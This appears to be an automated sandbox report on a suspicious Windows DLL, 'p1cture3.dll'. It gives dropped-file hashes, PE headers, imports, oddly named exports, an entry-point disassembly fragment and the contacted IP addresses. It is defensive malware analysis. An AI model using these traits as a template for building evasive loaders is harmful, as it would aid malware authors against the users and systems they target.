                                                                                                                                                                                            Preview: .. {.. "name": "otPcCenter",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY0NlbnRlciBvdC1oaWRlIG90LWZhZGUtaW4iIGFyaWEtbW9kYWw9InRydWUiIHJvbGU9ImRpYWxvZyIgYXJpYS1sYWJlbGxlZGJ5PSJvdC1wYy10aXRsZSI+PCEtLSBDbG9zZSBCdXR0b24gLS0+PGRpdiBjbGFzcz0ib3QtcGMtaGVhZGVyIj48IS0tIExvZ28gVGFnIC0tPjxkaXYgY2xhc3M9Im90LXBjLWxvZ28iIHJvbGU9ImltZyIgYXJpYS1sYWJlbD0iQ29tcGFueSBMb2dvIj48L2Rpdj48YnV0dG9uIGlkPSJjbG9zZS1wYy1idG4taGFuZGxlciIgY2xhc3M9Im90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIj48L2J1dHRvbj48L2Rpdj48IS0tIENsb3NlIEJ1dHRvbiAtLT48ZGl2IGlkPSJvdC1wYy1jb250ZW50IiBjbGFzcz0ib3QtcGMtc2Nyb2xsYmFyIj48aDMgaWQ9Im90LXBjLXRpdGxlIj5Zb3VyIFByaXZhY3k8L2gzPjxkaXYgaWQ9Im90LXBjLWRlc2MiPjwvZGl2PjxidXR0b24gaWQ9ImFjY2VwdC1yZWNvbW1lbmRlZC1idG4taGFuZGxlciI+QWxsb3cgYWxsPC9idXR0b24+PHNlY3Rpb24gY2xhc3M9Im90LXNkay1yb3cgb3QtY2F0LWdycCI+PGgzIGlkPSJvdC1jYXRlZ29yeS10aXRsZSI+TWFuYWdlIENvb2tpZSBQcmVmZXJlbmNlczwvaDM+PGRpdiBjbGFzcz0ib3QtcGxpLWhkciI+PHNwYW4gY2xhc3M9Im90LWxpLXRpdGxlIj5Db25zZW50PC9
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF2065DC2DD7D74F8D.TMP
                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):29989
                                                                                                                                                                                            Entropy (8bit):0.32963491973105535
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lw/9lw/9l2JD/9l2Jb9t:kBqoxKAuvScS+4+JD+JOJ3y
                                                                                                                                                                                            MD5:F00B1E24C011CA7908C24CB74785FC71
                                                                                                                                                                                            SHA1:AA32C6CB83C88AF9678F163305A2450AFC090DDF
                                                                                                                                                                                            SHA-256:7C6C9AD4198E3A8986B7718AAF0474A27F2B9C79A7AE7411790B7A79E19AF033
                                                                                                                                                                                            SHA-512:17CF0F8412BC12F107DF8318EB1943C2BC49FE6A138CCF6AAC533D48AF732F43737FE9B8E18527CED351264727C208EDDFF618F6279AFFB11723D270D5C7C4D2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF359017372D2FAB22.TMP
                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):191108
                                                                                                                                                                                            Entropy (8bit):3.1463451320518554
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:YiqZ/2Bfc6ru5rXfVStNiqZ/2BfcJru5rXfVSt:pa
                                                                                                                                                                                            MD5:79B9E1578A57632B5596889351D55335
                                                                                                                                                                                            SHA1:073A2034C09FD319696F19BF80C1733FCC863559
                                                                                                                                                                                            SHA-256:F6662951E28023FF9667E208321450E0250C13C9C2E92E66007875918CA74EF4
                                                                                                                                                                                            SHA-512:4522B2F6C30A947BB23801AB79381F82AFADF8CF45E62BED05855F871207F9BFD79CF73D7A0552A20A43F1F30FC13AF846D5C4A2316DB012908FD69EF6455EA3
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF454B5307E16E503B.TMP
                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):13877
                                                                                                                                                                                            Entropy (8bit):0.9323187229691247
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:c9lLh9lLh9lIn9lIn9lolDF9lolJ9lWlEKfAqf0dKhq3qhqYfbbfKhqYCYqhq7Kx:kBqoIUK3ThJbsVS0P01ZqA
                                                                                                                                                                                            MD5:BC0C991BD97F4EBACE521472691EAC15
                                                                                                                                                                                            SHA1:31AD3295F25780E63D83EEBFA1BDA5BDE5DA8C59
                                                                                                                                                                                            SHA-256:B15E5E9A45EBA9420DB3F5CC082899CB67D0C08357CC0DE064A3CB4BD0B2D824
                                                                                                                                                                                            SHA-512:E82F6B89053DAC5E0AC9794C9455FFDB795E1452E7313ADC62C16FA1F0C66EB4E44413B6F991CA52BBF2286A2B3DA19FBE29F5274099C9218664A3E864652076
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DFE4D7BDD0E6BE02F6.TMP
                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):39657
                                                                                                                                                                                            Entropy (8bit):0.5765035376100418
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:kBqoxKAuvScS+Z8ZaZAZhZKZQj5sM+j5sMCj5sMT:kBqoxKAuqR+2wqDwils5lshlsG
                                                                                                                                                                                            MD5:7D046F83DDD70B7672DFE4A96207DE33
                                                                                                                                                                                            SHA1:EC44BA52FFA5BBCE4A56689FE21588CEA6EB22E4
                                                                                                                                                                                            SHA-256:BD9338649A5507BED8C2A10BB2C60D22955B2A0A23934ECAE7A739150DE9AB92
                                                                                                                                                                                            SHA-512:9AB2F5E9BB8F8DD73376F0C67E454CA4C4AE58ADDFACC03E88303831D6F2C0056DBDFFAC40529718573EF3B70430E5CA7B8C4D65A003617F617D3BFABFDD60A5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DFFBA25DDF25B6D254.TMP
                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):39649
                                                                                                                                                                                            Entropy (8bit):0.5726190013205094
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:kBqoxKAuvScS+B/GCGLG3IG3W43PZG76LDyfNY843PZG76LDyfNYE43PZG76LDyo:kBqoxKAuvScS+B/NMPd4MP4ML4MQ
                                                                                                                                                                                            MD5:AAAC3E03861F184B292E5BBF33A97F1D
                                                                                                                                                                                            SHA1:73A5338A574DDBBC9418E55535CD3845A6BE3814
                                                                                                                                                                                            SHA-256:E5CAEDE5A76204D18AA4B8C8BE260A4366EBE42918A6B2B5A992246596FAF401
                                                                                                                                                                                            SHA-512:CD61E8DF96271679598C2D82E2AC288BF0F58BA2BA9557A256FD1D1FF69A05ACC3631288A31F5B0F8FAA0F782A33E860F05B6B32021FB1F974C7C09CB8A49000
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\66FLCXS2Z62MO7DK8423.temp
                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3440
                                                                                                                                                                                            Entropy (8bit):3.190718501691831
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:vL8diLPUIcC9GrIoMKAsASFjb2diLPUIch683GrIoMKAczH:vL7PUO9SpAJEbpPUD3SpAG
                                                                                                                                                                                            MD5:521E2D7CA0ED2BA8D4EEDE833FF4389F
                                                                                                                                                                                            SHA1:7313D0BCBAC4CDB446285494B12B11B1667B235E
                                                                                                                                                                                            SHA-256:4D4D6B41FBED7B983881269D6C1244EA5DB88CDD36D5BC73F43B874F2E9F0AE8
                                                                                                                                                                                            SHA-512:18629CCD7D7E65986CD81856D229436457933875DFABB30151F4296725BB4615C8C0D805822F3B2508FAB66430C87B640536306B44BF08C3EE817360F7D44BBF
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: ...................................FL..................F.@.. .....@.>...4>X......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Qwx..PROGRA~1..t......L.>Qwx....E...............J.....[...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..Q................................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.Q.......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...................C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JZU8E1FVG9AUP2XHFG6Z.temp
                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):3440
                                                                                                                                                                                            Entropy (8bit):3.1912006479451858
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:vL2diLPUIcC9GrIoMKAsASFjb2diLPUIch683GrIoMKAczH:vLpPUO9SpAJEbpPUD3SpAG
                                                                                                                                                                                            MD5:97705C1F752D6571A3020201E068FBB9
                                                                                                                                                                                            SHA1:4BBF3AD647DB033E86438211B3EC037FA751A68B
                                                                                                                                                                                            SHA-256:5D38CC7180C596960C56E2C687C38EEFDA1C04A5085DBA34A6DD2F82A0A4509C
                                                                                                                                                                                            SHA-512:E0CB8ABB4B50BADCF24E0B7894A12E8A9285BB9E4D3A9FB27AAF0043C10FE7572E8EB77B2A8BE414AD23957A0EAF8D8C3A8CD5FF7DF8B09682C8EB82E89406EA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: ...................................FL..................F.@.. .....@.>...4>X......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Qwx..PROGRA~1..t......L..Q......E...............J.....[...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..Q................................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.Q.......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...................C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

                                                                                                                                                                                            Static File Info

                                                                                                                                                                                            General

                                                                                                                                                                                            File type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                            Entropy (8bit):6.251112354632641
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                            • VXD Driver (31/22) 0.00%
                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                            File name:p1cture3.dll
                                                                                                                                                                                            File size:136704
                                                                                                                                                                                            MD5:363430ba47c7d69f75e9bc90dbbc1d8c
                                                                                                                                                                                            SHA1:47fe41dd67e0245c1ece8fcd2c10c713823db833
                                                                                                                                                                                            SHA256:00af5f13551c5e20fe29ec3d12dca555a56cd1edcd0a8633373872334de485ae
                                                                                                                                                                                            SHA512:4e081eb20aaaa487e9047f29b12b508d62fd77517652088d86e310d7d55492ecc4fb2033778cc0e9ce863ae00f7a36aeefa52a24e1e520897b53f8206abca785
                                                                                                                                                                                            SSDEEP:3072:PaWbgDTa51CF1J27oLaPfdWeu0JMNzfpodOCwdAf4:PXMDdJ2hPIeBCj
                                                                                                                                                                                            File Content Preview:MZ......................................................................!..L.!This -7Afram cannot be run in DOS mode....$.......PE..L..................!................>A............@..................................G..............................e......

                                                                                                                                                                                            File Icon

                                                                                                                                                                                            Icon Hash:74f0e4ecccdce0e4

                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                            General

                                                                                                                                                                                            Entrypoint:0x40413e
                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                            DLL Characteristics:
                                                                                                                                                                                            Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                            Import Hash:3c5ce00825859dda51eb5de893c2c46c

                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                            Instruction
                                                                                                                                                                                            push ebp
                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                            sub esp, 48h
                                                                                                                                                                                            push esi
                                                                                                                                                                                            push 00000022h
                                                                                                                                                                                            push 0040E6E8h
                                                                                                                                                                                            push 00000001h
                                                                                                                                                                                            call dword ptr [0040D144h]
                                                                                                                                                                                            mov dword ptr [ebp-38h], eax
                                                                                                                                                                                            push 00000015h
                                                                                                                                                                                            push dword ptr [00422244h]
                                                                                                                                                                                            push FFFFFF84h
                                                                                                                                                                                            call 00007FF78CC2566Dh
                                                                                                                                                                                            add esp, 0Ch
                                                                                                                                                                                            push 0000005Dh
                                                                                                                                                                                            push FFFFFFD5h
                                                                                                                                                                                            push 00000005h
                                                                                                                                                                                            push dword ptr [00422244h]
                                                                                                                                                                                            push FFFFFFDBh
                                                                                                                                                                                            push 0000003Ch
                                                                                                                                                                                            push FFFFFFE9h
                                                                                                                                                                                            call 00007FF78CC26DE8h
                                                                                                                                                                                            push FFFFFFB3h
                                                                                                                                                                                            push dword ptr [00422244h]
                                                                                                                                                                                            push eax
                                                                                                                                                                                            call 00007FF78CC24D30h
                                                                                                                                                                                            mov edx, 00000066h
                                                                                                                                                                                            add edx, dword ptr [00422254h]
                                                                                                                                                                                            sub edx, 7Eh
                                                                                                                                                                                            mov dword ptr [ebp-24h], edx
                                                                                                                                                                                            push 0000003Bh
                                                                                                                                                                                            push FFFFFFC3h
                                                                                                                                                                                            push 00000054h
                                                                                                                                                                                            jmp 00007FF78CC28678h
                                                                                                                                                                                            add edi, esi
                                                                                                                                                                                            rol esi, 0Bh
                                                                                                                                                                                            not edx
                                                                                                                                                                                            add edi, esi
                                                                                                                                                                                            add edx, esi
                                                                                                                                                                                            add edx, ebp
                                                                                                                                                                                            lea edi, dword ptr [edx+6B901122h]
                                                                                                                                                                                            int3
                                                                                                                                                                                            push eax
                                                                                                                                                                                            ret
                                                                                                                                                                                            jne 00007FF78CC25A26h
                                                                                                                                                                                            or edi, eax
                                                                                                                                                                                            mov eax, dword ptr [ecx]
                                                                                                                                                                                            add edi, dword ptr [esp+40h]
                                                                                                                                                                                            add ecx, dword ptr [esp+58h]
                                                                                                                                                                                            mov ecx, edi
                                                                                                                                                                                            ret
                                                                                                                                                                                            call dword ptr [0040A04Ch]
                                                                                                                                                                                            not edi
                                                                                                                                                                                            mov eax, esi
                                                                                                                                                                                            mov dword ptr [esp+24h], ecx
                                                                                                                                                                                            pop ecx
                                                                                                                                                                                            int3
                                                                                                                                                                                            and ecx, edi
                                                                                                                                                                                            mov ecx, ebx
                                                                                                                                                                                            add eax, ebx
                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                            mov eax, edi
                                                                                                                                                                                            mov dword ptr [0040D2E4h], eax
                                                                                                                                                                                            mov esi, edi
                                                                                                                                                                                            add edx, esi
                                                                                                                                                                                            test ebx, ebx
                                                                                                                                                                                            add dword ptr [ebp+000000A4h], ecx
                                                                                                                                                                                            add ebx, ebp
                                                                                                                                                                                            int3
                                                                                                                                                                                            push 00000000h

                                                                                                                                                                                            Data Directories

                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0xa6650xfc.text
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xbdc80x2e4.text
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2b0000x994.reloc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xd0000x440.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                            Sections

                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                            .text0x10000xb0ac0xb200False0.587671172753data6.63369052343IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .rdata0xd0000x4400x600False0.302734375DOS executable (COM, 0x8C-variant)2.79332490305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .data0xe0000x1c43a0x14400False0.654079861111data5.49862585867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .reloc0x2b0000x9940xa00False0.833984375data6.65585202764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                            Imports

                                                                                                                                                                                            DLLImport
                                                                                                                                                                                            advapi32.dllAllocateAndInitializeSid, RegCreateKeyExW, RegDeleteValueW, FreeSid, RegQueryValueExW, RegOpenKeyExW, RegCloseKey, RegSetValueExW, CheckTokenMembership
                                                                                                                                                                                            amstream.dllDllCanUnloadNow
                                                                                                                                                                                            crypt32.dllCertGetCertificateChain, CertFreeCertificateContext, CryptQueryObject, CryptMsgClose, CertVerifyCertificateChainPolicy, CertFreeCertificateChain, CryptMsgGetAndVerifySigner, CryptHashPublicKeyInfo, CryptDecodeObject, CryptMsgGetParam, CertCloseStore
                                                                                                                                                                                            dsauth.dllDhcpDsCleanupDS
                                                                                                                                                                                            gdi32.dllCreateFontIndirectW, GetObjectW
                                                                                                                                                                                            hnetcfg.dllHNetDeleteRasConnection
                                                                                                                                                                                            iernonce.dllRunOnceExProcess
                                                                                                                                                                                            kbdbene.dllKbdLayerDescriptor
                                                                                                                                                                                            kbdbu.dllKbdLayerDescriptor
                                                                                                                                                                                            kbdes.dllKbdLayerDescriptor
                                                                                                                                                                                            kbdgae.dllKbdLayerDescriptor
                                                                                                                                                                                            kbdhe319.dllKbdLayerDescriptor
                                                                                                                                                                                            kernel32.dllWideCharToMultiByte, UnhandledExceptionFilter, SetEvent, GetSystemTime, InterlockedIncrement, Sleep, CreateFileW, LoadLibraryExW, DelayLoadFailureHook, CreateDirectoryW, GetTempPathW, GetCurrentThreadId, GetFileAttributesW, SetFileTime, GetUserDefaultUILanguage, CreateWaitableTimerW, GetLastError, GetTickCount, QueryPerformanceCounter, GetStartupInfoA, CreateFileMappingW, GetCurrentProcessId, CloseHandle, LeaveCriticalSection, CancelWaitableTimer, TerminateProcess, InterlockedDecrement, UnmapViewOfFile, InterlockedCompareExchange, InitializeCriticalSection, LoadResource, LoadLibraryW, GetSystemDefaultUILanguage, GetNativeSystemInfo, VirtualProtect, GetFileTime, FindResourceW, HeapSetInformation, GetModuleFileNameW, MoveFileExW, LoadLibraryA, GetThreadLocale, InterlockedExchange, GetCurrentProcess, FileTimeToLocalFileTime, FormatMessageW, GetModuleHandleW, MapViewOfFile, CreateMutexW, MultiByteToWideChar, CreateEventW, SetUnhandledExceptionFilter, SearchPathW, LocalFree, LocalAlloc, GetExitCodeProcess, DeleteFileW, GetProcAddress, EnterCriticalSection, FreeLibrary, FindResourceExW, lstrcmpA, SetLastError, GetVersion, SetWaitableTimer, GetVersionExW, GetModuleHandleA, OutputDebugStringA, GetSystemDirectoryW, DeleteCriticalSection, ReleaseMutex, WaitForSingleObject
                                                                                                                                                                                            loadperf.dllUnloadPerfCounterTextStringsW
                                                                                                                                                                                            lpk.dllLpkGetCharacterPlacement
                                                                                                                                                                                            mcicda.dllDriverProc
                                                                                                                                                                                            mprapi.dllMprConfigInterfaceDelete
                                                                                                                                                                                            msafd.dllWSPStartup
                                                                                                                                                                                            msdmo.dllMoFreeMediaType
                                                                                                                                                                                            msisip.dllDllRegisterServer
                                                                                                                                                                                            msvcrt.dll__CxxFrameHandler, strcspn, _ultow, ___lc_handle_func, __crtGetStringTypeW, bsearch, _cexit, _controlfp, __set_app_type, abort, wctomb, _write, __pctype_func, malloc, ___lc_codepage_func, ___mb_cur_max_func, exit, _acmdln, ferror, wcsncmp, wcsrchr, _vsnwprintf, __setusermatherr, _lock, _lseeki64, _onexit, mbtowc, __RTDynamicCast, __crtLCMapStringW, __pioinfo, __uncaught_exception, _wtoi, _itoa, _errno, _wcsnicmp, memcpy, iswspace, setlocale, __badioinfo, _initterm, _callnewh, _amsg_exit, localeconv, _unlock, _XcptFilter, memmove, _CxxThrowException, __mb_cur_max, _wcsicmp, isleadbyte, _snprintf, __getmainargs, _iob, _isatty, _purecall, memchr, _fileno, _ltow, _beginthreadex, __dllonexit, free, _waccess, _ismbblead, _exit, memset
                                                                                                                                                                                            ntdll.dllRtlUnwind
                                                                                                                                                                                            ole32.dllStringFromCLSID, CoRevokeClassObject, CoUninitialize, CLSIDFromString, CoInitializeEx, CoInitializeSecurity, CoRegisterClassObject, CoCreateInstance, CoTaskMemFree
                                                                                                                                                                                            opengl32.dllglLoadMatrixf
                                                                                                                                                                                            rasdlg.dllRasUserEnableManualDial
                                                                                                                                                                                            scrobj.dllDllUnregisterServerEx
                                                                                                                                                                                            scrrun.dllDllRegisterServer
                                                                                                                                                                                            serialui.dlldrvGetDefaultCommConfigW
                                                                                                                                                                                            shell32.dllShell_NotifyIconW, ShellExecuteExW
                                                                                                                                                                                            shlwapi.dllPathFindExtensionW, AssocQueryStringW
                                                                                                                                                                                            termmgr.dllDllUnregisterServer
                                                                                                                                                                                            urlmon.dllCoInternetParseUrl, URLDownloadToCacheFileW, CoInternetCombineUrl
                                                                                                                                                                                            user32.dllGetClipboardData, MessageBoxW, SendDlgItemMessageW, GetSystemMetrics, OffsetRect, GetParent, DialogBoxParamW, GetSubMenu, PostThreadMessageW, DefWindowProcW, GetIconInfo, GetDesktopWindow, GetCursorPos, RegisterClassW, LoadIconW, PostQuitMessage, UnregisterClassW, DestroyWindow, EnableMenuItem, DispatchMessageW, LoadMenuW, TrackPopupMenu, LoadStringW, SetWindowPos, LoadImageW, CreateWindowExW, EndDialog, GetWindowRect, TranslateMessage, GetMessageW, CopyRect, SendMessageW, SetWindowTextW, SetForegroundWindow, DestroyMenu
                                                                                                                                                                                            wdigest.dllSpInstanceInit
                                                                                                                                                                                            wintrust.dllWinVerifyTrust
                                                                                                                                                                                            wshtcpip.dllWSHSetSocketInformation

                                                                                                                                                                                            Exports

                                                                                                                                                                                            NameOrdinalAddress
                                                                                                                                                                                            Bighearted10x402440
                                                                                                                                                                                            Soaking20x40289c
                                                                                                                                                                                            Turnipy30x403499
                                                                                                                                                                                            Watertight40x403dae
                                                                                                                                                                                            Dithery50x40413e
                                                                                                                                                                                            Anhimae60x404662
                                                                                                                                                                                            Anostraca70x405543
                                                                                                                                                                                            DllRegisterServer80x40d358
                                                                                                                                                                                            Anaerobian90x40618b
                                                                                                                                                                                            Sparsile100x407496
                                                                                                                                                                                            DllUnregisterServer110x40d380

                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Dec 18, 2020 14:13:41.827805042 CET4975980192.168.2.365.9.70.182
                                                                                                                                                                                            Dec 18, 2020 14:13:41.827873945 CET4976080192.168.2.365.9.70.182
                                                                                                                                                                                            Dec 18, 2020 14:13:41.846014977 CET804975965.9.70.182192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:41.846060991 CET804976065.9.70.182192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:41.846179008 CET4975980192.168.2.365.9.70.182
                                                                                                                                                                                            Dec 18, 2020 14:13:41.846229076 CET4976080192.168.2.365.9.70.182
                                                                                                                                                                                            Dec 18, 2020 14:13:41.850676060 CET4975980192.168.2.365.9.70.182
                                                                                                                                                                                            Dec 18, 2020 14:13:41.868877888 CET804975965.9.70.182192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:42.110357046 CET804975965.9.70.182192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:42.110440016 CET4975980192.168.2.365.9.70.182
                                                                                                                                                                                            Dec 18, 2020 14:14:11.864094019 CET804976065.9.70.182192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:14:11.864504099 CET4976080192.168.2.365.9.70.182

                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Dec 18, 2020 14:12:54.369376898 CET6010053192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:12:54.383260965 CET53601008.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:12:55.187031031 CET5319553192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:12:55.199575901 CET53531958.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:12:56.309542894 CET5014153192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:12:56.322472095 CET53501418.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:12:57.474977016 CET5302353192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:12:57.487958908 CET53530238.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:12:58.404162884 CET4956353192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:12:58.417136908 CET53495638.8.8.8192.168.2.3
